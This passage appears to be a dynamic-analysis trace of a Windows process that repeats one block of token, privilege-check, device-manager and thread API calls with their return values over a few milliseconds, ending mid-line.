[0016.975] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.975] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.975] SetLastError (dwErrCode=0x522) [0016.975] CloseHandle (hObject=0x114) returned 1 [0016.975] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.975] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.975] GetLastError () returned 0x578 [0016.975] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.975] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.975] GetCurrentThread () returned 0xfffffffe [0016.975] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.975] GetLastError () returned 0x3f0 [0016.975] GetCurrentProcess () returned 0xffffffff [0016.975] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.976] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.976] SetLastError (dwErrCode=0x522) [0016.976] CloseHandle (hObject=0x114) returned 1 [0016.976] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.976] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.976] GetLastError () returned 0x578 [0016.976] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.976] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.976] GetCurrentThread () returned 0xfffffffe [0016.976] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.976] GetLastError () returned 0x3f0 [0016.976] GetCurrentProcess () returned 0xffffffff [0016.976] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.976] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.976] SetLastError (dwErrCode=0x522) [0016.976] CloseHandle (hObject=0x114) returned 1 [0016.976] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.976] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.976] GetLastError () returned 0x578 [0016.976] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.976] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.976] GetCurrentThread () returned 0xfffffffe [0016.976] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.976] GetLastError () returned 0x3f0 [0016.976] GetCurrentProcess () returned 0xffffffff [0016.976] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.976] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.976] SetLastError (dwErrCode=0x522) [0016.976] CloseHandle (hObject=0x114) returned 1 [0016.976] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.976] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.976] GetLastError () returned 0x578 [0016.976] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.976] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.976] GetCurrentThread () returned 0xfffffffe [0016.976] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.976] GetLastError () returned 0x3f0 [0016.976] GetCurrentProcess () returned 0xffffffff [0016.976] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.976] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.976] SetLastError (dwErrCode=0x522) [0016.976] CloseHandle (hObject=0x114) returned 1 [0016.976] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.977] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.977] GetLastError () returned 0x578 [0016.977] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.977] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.977] GetCurrentThread () returned 0xfffffffe [0016.977] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.977] GetLastError () returned 0x3f0 [0016.977] GetCurrentProcess () returned 0xffffffff [0016.977] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.977] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.977] SetLastError (dwErrCode=0x522) [0016.977] CloseHandle (hObject=0x114) returned 1 [0016.977] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.977] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.977] GetLastError () returned 0x578 [0016.977] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.977] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.977] GetCurrentThread () returned 0xfffffffe [0016.977] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.977] GetLastError () returned 0x3f0 [0016.977] GetCurrentProcess () returned 0xffffffff [0016.977] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.977] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.977] SetLastError (dwErrCode=0x522) [0016.977] CloseHandle (hObject=0x114) returned 1 [0016.977] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.977] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.977] GetLastError () returned 0x578 [0016.977] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.977] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.977] GetCurrentThread () returned 0xfffffffe [0016.977] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.977] GetLastError () returned 0x3f0 [0016.977] GetCurrentProcess () returned 0xffffffff [0016.977] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.977] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.977] SetLastError (dwErrCode=0x522) [0016.977] CloseHandle (hObject=0x114) returned 1 [0016.977] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.977] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.977] GetLastError () returned 0x578 [0016.977] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.977] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.977] GetCurrentThread () returned 0xfffffffe [0016.978] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.978] GetLastError () returned 0x3f0 [0016.978] GetCurrentProcess () returned 0xffffffff [0016.978] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.978] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.978] SetLastError (dwErrCode=0x522) [0016.978] CloseHandle (hObject=0x114) returned 1 [0016.978] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.978] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.978] GetLastError () returned 0x578 [0016.978] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.978] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.978] GetCurrentThread () returned 0xfffffffe [0016.978] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.978] GetLastError () returned 0x3f0 [0016.978] GetCurrentProcess () returned 0xffffffff [0016.978] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.978] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.978] SetLastError (dwErrCode=0x522) [0016.978] CloseHandle (hObject=0x114) returned 1 [0016.978] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.978] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.978] GetLastError () returned 0x578 [0016.978] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.978] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.978] GetCurrentThread () returned 0xfffffffe [0016.978] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.978] GetLastError () returned 0x3f0 [0016.978] GetCurrentProcess () returned 0xffffffff [0016.978] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.978] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.978] SetLastError (dwErrCode=0x522) [0016.978] CloseHandle (hObject=0x114) returned 1 [0016.978] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.978] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.978] GetLastError () returned 0x578 [0016.978] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.978] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.978] GetCurrentThread () returned 0xfffffffe [0016.978] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.978] GetLastError () returned 0x3f0 [0016.978] GetCurrentProcess () returned 0xffffffff [0016.978] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.978] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.979] SetLastError (dwErrCode=0x522) [0016.979] CloseHandle (hObject=0x114) returned 1 [0016.979] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.979] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.979] GetLastError () returned 0x578 [0016.979] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.979] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.979] GetCurrentThread () returned 0xfffffffe [0016.979] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.979] GetLastError () returned 0x3f0 [0016.979] GetCurrentProcess () returned 0xffffffff [0016.979] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.979] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.979] SetLastError (dwErrCode=0x522) [0016.979] CloseHandle (hObject=0x114) returned 1 [0016.979] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.979] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.979] GetLastError () returned 0x578 [0016.979] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.979] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.979] GetCurrentThread () returned 0xfffffffe [0016.979] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.979] GetLastError () returned 0x3f0 [0016.979] GetCurrentProcess () returned 0xffffffff [0016.979] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.979] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.979] SetLastError (dwErrCode=0x522) [0016.979] CloseHandle (hObject=0x114) returned 1 [0016.979] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.979] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.979] GetLastError () returned 0x578 [0016.979] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.979] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.979] GetCurrentThread () returned 0xfffffffe [0016.979] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.979] GetLastError () returned 0x3f0 [0016.979] GetCurrentProcess () returned 0xffffffff [0016.979] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.979] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.979] SetLastError (dwErrCode=0x522) [0016.979] CloseHandle (hObject=0x114) returned 1 [0016.979] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.979] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.980] GetLastError () returned 0x578 [0016.980] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.980] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.980] GetCurrentThread () returned 0xfffffffe [0016.980] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.980] GetLastError () returned 0x3f0 [0016.980] GetCurrentProcess () returned 0xffffffff [0016.980] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.980] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.980] SetLastError (dwErrCode=0x522) [0016.980] CloseHandle (hObject=0x114) returned 1 [0016.980] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.980] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.980] GetLastError () returned 0x578 [0016.980] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.980] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.980] GetCurrentThread () returned 0xfffffffe [0016.980] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.980] GetLastError () returned 0x3f0 [0016.980] GetCurrentProcess () returned 0xffffffff [0016.980] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.980] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.980] SetLastError (dwErrCode=0x522) [0016.980] CloseHandle (hObject=0x114) returned 1 [0016.980] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.980] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.980] GetLastError () returned 0x578 [0016.980] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.980] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.980] GetCurrentThread () returned 0xfffffffe [0016.980] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.980] GetLastError () returned 0x3f0 [0016.980] GetCurrentProcess () returned 0xffffffff [0016.980] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.980] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.980] SetLastError (dwErrCode=0x522) [0016.980] CloseHandle (hObject=0x114) returned 1 [0016.980] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.980] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.980] GetLastError () returned 0x578 [0016.980] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.980] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.980] GetCurrentThread () returned 0xfffffffe [0016.980] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.981] GetLastError () returned 0x3f0 [0016.981] GetCurrentProcess () returned 0xffffffff [0016.981] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.981] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.981] SetLastError (dwErrCode=0x522) [0016.981] CloseHandle (hObject=0x114) returned 1 [0016.981] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.981] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.981] GetLastError () returned 0x578 [0016.981] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.981] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.981] GetCurrentThread () returned 0xfffffffe [0016.981] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.981] GetLastError () returned 0x3f0 [0016.981] GetCurrentProcess () returned 0xffffffff [0016.981] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.981] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.981] SetLastError (dwErrCode=0x522) [0016.981] CloseHandle (hObject=0x114) returned 1 [0016.981] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.981] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.981] GetLastError () returned 0x578 [0016.981] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.981] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.981] GetCurrentThread () returned 0xfffffffe [0016.981] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.981] GetLastError () returned 0x3f0 [0016.981] GetCurrentProcess () returned 0xffffffff [0016.981] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.981] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.981] SetLastError (dwErrCode=0x522) [0016.981] CloseHandle (hObject=0x114) returned 1 [0016.981] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.981] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.981] GetLastError () returned 0x578 [0016.981] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.981] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.981] GetCurrentThread () returned 0xfffffffe [0016.981] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.981] GetLastError () returned 0x3f0 [0016.981] GetCurrentProcess () returned 0xffffffff [0016.981] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.981] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.982] SetLastError (dwErrCode=0x522) [0016.982] CloseHandle (hObject=0x114) returned 1 [0016.982] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.982] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.982] GetLastError () returned 0x578 [0016.982] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.982] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.982] GetCurrentThread () returned 0xfffffffe [0016.982] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.982] GetLastError () returned 